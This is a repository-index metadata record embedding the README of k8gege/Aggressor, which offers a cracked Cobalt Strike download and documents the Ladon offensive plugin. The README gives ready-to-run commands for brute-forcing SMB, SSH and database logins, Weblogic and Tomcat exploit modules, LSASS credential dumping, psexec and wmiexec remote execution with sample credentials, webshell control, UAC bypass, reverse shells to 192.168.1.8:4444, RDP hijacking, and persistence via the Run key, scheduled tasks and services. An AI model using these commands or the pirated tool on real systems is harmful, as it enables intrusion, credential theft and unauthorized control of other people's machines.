{"id":19951803,"url":"https://github.com/k8gege/aggressor","last_synced_at":"2026-01-26T12:35:51.579Z","repository":{"id":43956994,"uuid":"216055159","full_name":"k8gege/Aggressor","owner":"k8gege","description":"Ladon 911 for Cobalt Strike \u0026 Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp","archived":false,"fork":false,"pushed_at":"2022-07-28T15:12:42.000Z","size":18670,"stargazers_count":1001,"open_issues_count":20,"forks_count":192,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-01-12T06:23:38.502Z","etag":null,"topics":["aggressor-scripts","brute-force","cobalt-strike","k8cscan","ladon","osscan","portscan","scanner","subdomain","webscan"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/k8gege.png","metadata":{"files":{"readme":"README.md","changelog":"Change.log","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-10-18T15:31:32.000Z","updated_at":"2024-12-29T13:54:51.000Z","dependencies_parsed_at":"2022-07-18T08:13:12.328Z","dependency_job_id":null,"html_url":"https://github.com/k8gege/Aggressor","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FAggressor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/k8gege","download_url":"https://codeload.github.com/k8gege/Aggressor/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241381645,"owners_count":19953751,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aggressor-scripts","brute-force","cobalt-strike","k8cscan","ladon","osscan","portscan","scanner","subdomain","webscan"],"created_at":"2024-11-13T01:09:46.767Z","updated_at":"2026-01-26T12:35:46.535Z","avatar_url":"https://github.com/k8gege.png","language":null,"readme":"# Ladon 911 for Cobalt Strike\n![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg)\n\n[![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) \n[![Ladon](https://img.shields.io/badge/Ladon-911-yellowgreen)](https://github.com/k8gege/Aggressor) \n[![Bin](https://img.shields.io/badge/Aggressor-Bin-ff69b4)](https://github.com/k8gege/Aggressor/releases) \n[![GitHub issues](https://img.shields.io/github/issues/k8gege/Aggressor)](https://github.com/k8gege/Aggressor/issues) \n[![Github Stars](https://img.shields.io/github/stars/k8gege/Aggressor)](https://github.com/k8gege/Aggressor) \n[![GitHub forks](https://img.shields.io/github/forks/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)\n[![GitHub license](https://img.shields.io/github/license/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)\n[![Downloads](https://img.shields.io/github/downloads/k8gege/Aggressor/total?label=Release%20Download)](https://github.com/k8gege/Aggressor/releases/latest)\n\n\n### Ladon For Cobalt Strike\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/CS_Ladon.gif\u003e\u003c/img\u003e\n\n### Cobalt Strike Cracked by k8gege\n\nDownLoad: https://github.com/k8gege/Aggressor/releases/tag/cs\n\n### Cobalt Strike  K8破解版\nCobalt Strike 4.4\u003cbr\u003e\nCobalt Strike 4.3\u003cbr\u003e\nCobalt Strike 3.13\u003cbr\u003e\nCobalt Strike 3.12\u003cbr\u003e\n\n1.内置Windows版TeamServer.exe启动器\n2.内置巨龙拉冬Ladon7.2中英文版插件\n\n### 巨龙拉冬9.0: 让你的Cobalt Strike变成超级武器 \n9.0插件获取：https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA\n\n#### 无图无真相\n\n好了废话不多说上图，让我们看看Cobalt Strike 4.4巨龙拉冬插件功能\n\n\n如果你熟悉Ladon命令的可以直接在Beacon上执行相应命令即可，如使用“Ladon GetID”命令查看目标机器名、机器ID、CPUID、硬盘ID、MAC地址等信息，主要用于区分一些大内网同名机器，或其它用途。若是你不熟悉可以使用右键菜单，为了方便新人或不太熟的人\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44.PNG)\n\n\n如果不熟悉Ladon命令用法，也可以右键菜单，使用非常方便，只需选择模块填写目标参数如(IP、URL、域名、主机名、CIDR格式IP等)，即可加载对应模块扫描或探测你想获取的信息，如探测C段存在MS17010漏洞的机器。\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_9.PNG)\n\n\n内网外网网络资产探测\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_2.PNG)\n\n\n操作系统信息探测\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_3.PNG)\n\n\n漏洞检测\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_4.PNG)\n\n\n网络密码审计\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_5.PNG)\n\n\n本机信息收集\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_6.PNG)\n\n\n横向移动、远程执行\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_7.PNG)\n\n\n权限提升、本地提权\n\n![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_8.PNG)\n\n### 程序简介\n\nLadon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描。7.0版本内置83个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等，密码爆破12种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种（Web应用、中间件、脚本类型、页面类型）等，可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。\n\n### 使用文档\n\nID | 主题 |  URL \n-|-|-\n0 | Ladon完整文档 | https://k8gege.org/Ladon\n\n### DownLoad\nNew Version：https://k8gege.org/Download \u003cbr\u003e\nAll Version: https://github.com/k8gege/Ladon/releases/\n\n\n### 0.Cobalt Strike联动\n![](https://github.com/k8gege/K8CScan/blob/master/Images/CobaltStrike.gif)\n\n\n### 前言\n\n本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。\n\n完整文档：http://k8gege.org/Ladon\n\n### 资产扫描、指纹识别、服务识别、存活主机、端口扫描\n\n##### 001 多协议探测存活主机 （IP、机器名、MAC地址、制造商）\nLadon 192.168.1.8/24 OnlinePC\n\n##### 002 多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）\nLadon 192.168.1.8/24 OsScan\n\n##### 003 扫描存活主机\nLadon 192.168.1.8/24 OnlineIP\n\n##### 004 ICMP扫描存活主机\nLadon 192.168.1.8/24 Ping\n\n##### 005 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）\nLadon 192.168.1.8/24 MS17010\n\n##### 006 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）\nLadon 192.168.1.8/24 SMBGhost\n\n##### 007 扫描Web信息/Http服务\nLadon 192.168.1.8/24 WebScan\n\n##### 008 扫描C段站点URL域名\nLadon 192.168.1.8/24 UrlScan\n\n##### 009 扫描C段站点URL域名\nLadon 192.168.1.8/24 SameWeb\n\n##### 010 扫描子域名、二级域名\nLadon baidu.com SubDomain\n\n##### 011 域名解析IP、主机名解析IP\nLadon baidu.com DomainIP\nLadon baidu.com HostIP\n\n##### 012 域内机器信息获取\nLadon AdiDnsDump 192.168.1.8 （Domain IP）\n\n##### 013 扫描C段端口、指定端口扫描\nLadon 192.168.1.8/24 PortScan\nLadon 192.168.1.8 PortScan 80,445,3389\n\n##### 014 扫描C段WEB以及CMS（75种Web指纹识别）\nLadon 192.168.1.8/24 WhatCMS\n\n##### 015 扫描思科设备\nLadon 192.168.1.8/24 CiscoScan\nLadon http://192.168.1.8 CiscoScan\n\n##### 016 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）\nLadon EnumMssql\n\n##### 017 枚举网络共享资源 \t（域、存活IP、共享路径）\nLadon EnumShare\n\n##### 018 扫描LDAP服务器\nLadon 192.168.1.8/24 LdapScan\n\n##### 019 扫描FTP服务器\nLadon 192.168.1.8/24 FtpScan\n\n### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆\n\n密码爆破详解参考SSH：http://k8gege.org/Ladon/sshscan.html\n\n##### 020 445端口 SMB密码爆破(Windows)\nLadon 192.168.1.8/24 SmbScan\n\n##### 021 135端口 Wmi密码爆破(Windowns)\nLadon 192.168.1.8/24 WmiScan\n\n##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)\nLadon 192.168.1.8/24 LdapScan\n\n##### 023 5985端口 Winrm密码爆破(Windowns)\nLadon 192.168.1.8/24 WinrmScan.ini\n\n##### 024 445端口 SMB NTLM HASH爆破(Windows)\nLadon 192.168.1.8/24 SmbHashScan\n\n##### 025 135端口 Wmi NTLM HASH爆破(Windows)\nLadon 192.168.1.8/24 WmiHashScan\n\n##### 026 22端口 SSH密码爆破(Linux)\nLadon 192.168.1.8/24 SshScan\nLadon 192.168.1.8:22 SshScan\n\n##### 027 1433端口 Mssql数据库密码爆破\nLadon 192.168.1.8/24 MssqlScan\n\n##### 028 1521端口 Oracle数据库密码爆破\nLadon 192.168.1.8/24 OracleScan\n\n##### 029 3306端口 Mysql数据库密码爆破\nLadon 192.168.1.8/24 MysqlScan\n\n##### 030 7001端口 Weblogic后台密码爆破\nLadon http://192.168.1.8:7001/console WeblogicScan\nLadon 192.168.1.8/24 WeblogicScan\n\n##### 031 5900端口 VNC远程桌面密码爆破\nLadon 192.168.1.8/24 VncScan\n\n##### 032 21端口 Ftp服务器密码爆破\nLadon 192.168.1.8/24 FtpScan\n\n##### 033 8080端口 Tomcat后台登陆密码爆破\nLadon 192.168.1.8/24 TomcatScan\nLadon http://192.168.1.8:8080/manage TomcatScan\n\n##### 034 Web端口 401基础认证密码爆破\nLadon http://192.168.1.8/login HttpBasicScan\n\n##### 035 445端口 Impacket SMB密码爆破(Windowns)\nLadon 192.168.1.8/24 SmbScan.ini\n\n##### 036 445端口 IPC密码爆破(Windowns)\nLadon 192.168.1.8/24 IpcScan.ini\n\n\n\n### 漏洞检测/漏洞利用/Poc/Exp\n\n##### 037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)\nLadon 192.168.1.8/24 MS17010\n\n##### 038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)\nLadon 192.168.1.8/24 WeblogicPoc\n\n##### 039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)\nLadon 192.168.1.8/24 PhpStudyPoc\n\n##### 040 ActiveMQ漏洞检测(CVE-2016-3088)\nLadon 192.168.1.8/24 ActivemqPoc\n\n##### 041 Tomcat漏洞检测(CVE-2017-12615)\nLadon 192.168.1.8/24 TomcatPoc\n\n##### 042 Weblogic漏洞利用(CVE-2019-2725)\nLadon 192.168.1.8/24 WeblogicExp\n\n##### 043 Tomcat漏洞利用(CVE-2017-12615)\nLadon 192.168.1.8/24 TomcatExp\n\n##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)\nLadon 192.168.1.8/24 Struts2Poc\n\n\n\n### FTP下载、HTTP下载\n\n##### 045 HTTP下载\nLadon HttpDownLoad http://k8gege.org/Download/Ladon.rar\n\n##### 046 Ftp下载 \t\nLadon FtpDownLoad 127.0.0.1:21 admin admin test.exe\n\n### 加密解密(HEX/Base64)\n\n##### 047 Hex加密解密\n\nLadon 123456 EnHex\nLadon 313233343536 DeHex\n\n##### 048 Base64加密解密\n\nLadon 123456 EnBase64\nLadon MTIzNDU2 DeBase64\n\n### 网络嗅探\n\n##### 049 Ftp密码嗅探 \t\nLadon FtpSniffer 192.168.1.5\n\n##### 050 HTTP密码嗅探 \t\nLadon HTTPSniffer 192.168.1.5\n\n##### 051 网络嗅探\t\nLadon Sniffer\n\n### 密码读取\n\n##### 052 读取IIS站点密码、网站路径\nLadon IISpwd\n\n##### DumpLsass内存密码 \t\nLadon DumpLsass\n\n### 信息收集\n\n##### 053 进程详细信息 \t\nLadon EnumProcess\nLadon Tasklist\n\n##### 054 获取命令行参数 \t\nLadon cmdline\nLadon cmdline cmd.exe\n\n##### 055 获取渗透基础信息 \t\nLadon GetInfo\nLadon GetInfo2\n\n##### 056 .NET \u0026 PowerShell版本 \t\nLadon NetVer\nLadon PSver\nLadon NetVersion\nLadon PSversion\n\n##### 057 运行时版本\u0026编译环境 \t\nLadon Ver\nLadon Version\n\n### 远程执行(psexec/wmiexec/atexec/sshexec)\n\n##### 445端口 PSEXEC远程执行命令（交互式）\n\nnet user \\\\192.168.1.8 k8gege520 /user:k8gege\nLadon psexec 192.168.1.8\npsexec\u003e whoami\nnt authority\\system\n\n##### 058 135端口 WmiExec远程执行命令 （非交互式）\nLadon wmiexec 192.168.1.8 k8gege k8gege520 whoami\n\n##### 059 445端口 AtExec远程执行命令（非交互式）\nLadon wmiexec 192.168.1.8 k8gege k8gege520 whoami\n\n##### 060 22端口 SshExec远程执行命令（非交互式）\nLadon SshExec 192.168.1.8 k8gege k8gege520 whoami\nLadon SshExec 192.168.1.8 22 k8gege k8gege520 whoami\n\n##### 061 JspShell远程执行命令（非交互式）\nUsage：Ladon JspShell type url pwd cmd\nExample: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami\n\n#### 062 WebShell远程执行命令（非交互式）\n```Bash\nUsage：Ladon WebShell ScriptType ShellType url pwd cmd\nExample: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami\nExample: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami\nExample: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami\n```\n\n### 提权降权\n\n##### 063 BypassUac 绕过UAC执行,支持Win7-Win10 \t\nLadon BypassUac c:\\1.exe\nLadon BypassUac c:\\1.bat\n\n##### 064 GetSystem 提权或降权运行程序 \t\nLadon GetSystem cmd.exe\nLadon GetSystem cmd.exe explorer\n\n##### 065 Runas 模拟用户执行命令 \t\nLadon Runas user pass cmd\n\n### 其它功能\n\n##### 066 一键启用.net 3.5\t\nLadon EnableDotNet\n\n##### 067 获取内网站点HTML源码 \t\nLadon gethtml http://192.168.1.1\n\n##### 068 检测后门\nLadon CheckDoor\nLadon AutoRun\n\n##### 069 获取本机内网IP与外网IP \t\nLadon GetIP\n\n##### 070 一键迷你WEB服务器 \t\nLadon WebSer 80\nLadon web 80\n\n### 反弹Shell\n\n##### 071 反弹TCP NC Shell\nLadon ReverseTcp 192.168.1.8 4444 nc\n\n##### 072 反弹TCP MSF Shell\nLadon ReverseTcp 192.168.1.8 4444 shell\n\n##### 073 反弹TCP MSF MET Shell\nLadon ReverseTcp 192.168.1.8 4444 meter\n\n##### 074 反弹HTTP MSF MET Shell\nLadon ReverseHttp 192.168.1.8 4444\n\n##### 075 反弹HTTPS MSF MET Shell\nLadon ReverseHttps 192.168.1.8 4444\n\n##### 076 反弹TCP CMD \u0026 PowerShell Shell\nLadon PowerCat -r 192.168.1.8 4444 cmd\nLadon PowerCat -r 192.168.1.8 4444 psh\n\n##### 077 反弹UDP Cmd \u0026 PowerShell Shell\nLadon PowerCat -r 192.168.1.110 4444 cmd -u\nLadon PowerCat -r 192.168.1.8 4444 psh -u\n\n##### 078 RDP桌面会话劫持（无需密码）\nLadon RDPHijack 3\nLadon RDPHijack 3 console\n\n##### 079 OXID定位多网卡主机\nLadon 192.168.1.8/24 EthScan\nLadon 192.168.1.8/24 OxidScan\n\n#### 080 查看用户最近访问文件\nLadon Recent\n\n#### 081 添加注册表Run启动项\nLadon RegAuto Test c:\\123.exe\n\n#### 082 AT计划执行程序(无需时间)(system权限)\nLadon at c:\\123.exe\nLadon at c:\\123.exe gui\n\n#### 083 SC服务加启动项\u0026执行程序(system权限）\nLadon sc c:\\123.exe\nLadon sc c:\\123.exe gui\nLadon sc c:\\123.exe auto ServerName\n\n### 工具下载\n\n历史版本: https://github.com/k8gege/Ladon/releases\n\n### 最新版\n最新版在小密圈：http://k8gege.org/Ladon/update.txt\n\u003cdiv style=\"text-align: center; width: 710px; border: green solid 0px;\"\u003e\n\u003cimg alt=\"\" src=\"http://k8gege.org/img/k8team.jpg\" style=\"display: inline-block;width: 250px;height: 300px;\" /\u003e\n\u003c/div\u003e\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/k8gege/Aggressor.svg)](https://starchart.cc/k8gege/Aggressor)\n\n\u003cimg align='right' src=\"https://profile-counter.glitch.me/Aggressor/count.svg\" width=\"200\"\u003e\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Faggressor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fk8gege%2Faggressor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Faggressor/lists"}